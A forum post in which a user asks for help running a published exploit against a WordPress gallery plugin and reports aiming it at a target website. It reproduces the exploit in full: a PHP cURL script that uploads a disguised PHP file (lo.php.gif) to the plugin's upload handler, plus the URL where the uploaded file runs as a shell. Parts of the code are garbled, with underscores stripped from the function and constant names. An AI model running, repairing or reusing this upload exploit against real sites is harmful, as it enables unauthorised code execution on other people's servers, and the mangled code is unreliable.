Can someone help me understand this exploit? From the exploit I assumed I was supposed to make two files using the code provided. One named PostShell.php and one named lo.php.gif. I've done that and changed the curl_init value to the url of the website. I ran php PostShell.php but get the following error:
PHP Parse error: syntax error, unexpected '"http://www.targetwebsite.com/w' (TCONSTANTENCAPSED_STRING) in /root/postshell.php on line 5
Thanks for those who can help!
#?#?This? is the exploit on exploit-db
https://www.exploit-db.com/exploits/18998/
##This is the code of the exploit
Exploit :
PostShell.php
<?php
$uploadfile="lo.php.gif";
$ch =
curl_init("http://www.exemple.com/…/plug…/gallery-plugin/upload/php.php");
curlsetopt($ch, CURLOPTPOST, true);
curlsetopt($ch, CURLOPTPOSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curlsetopt($ch, CURLOPTRETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access :
http://www.exemple.com/…/gallery-pl…/upload/files/lo.php.gif
lo.php.gif
<?php
phpinfo();
?>
Be the First to Respond
Share Your Thoughts